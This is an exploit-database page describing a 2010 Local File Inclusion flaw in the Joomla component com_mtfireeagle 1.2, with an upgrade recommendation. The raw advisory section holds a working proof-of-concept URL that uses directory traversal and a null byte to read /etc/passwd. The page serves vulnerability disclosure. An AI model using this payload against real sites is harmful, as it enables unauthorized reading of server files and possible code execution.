header-logo
Suggest Exploit
vendor:
com_mtfireeagle
by:
AntiSecurity
9,3
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: com_mtfireeagle
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component MT Fire Eagle Local File Inclusion Vulnerability

A Local File Inclusion (LFI) vulnerability exists in the com_mtfireeagle version 1.2 component for Joomla. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This can allow the attacker to include arbitrary files from the server, which can lead to the disclosure of sensitive information or the execution of arbitrary code.

Mitigation:

Upgrade to the latest version of the com_mtfireeagle component.
Source

Exploit-DB raw data:

=================================================================================================================


  [o] Joomla Component MT Fire Eagle Local File Inclusion Vulnerability
 
       Software : com_mtfireeagle version 1.2
       Vendor   : http://www.moto-treks.com/
       Download : http://joomlacode.org/gf/project/jfireeagle/frs/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


=================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_mtfireeagle&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00


=================================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11


=================================================================================================================


  [o] April 14 2010 - GMT +07:00 Jakarta, Indonesia

Navigation

Suggest Exploit

Services By CQR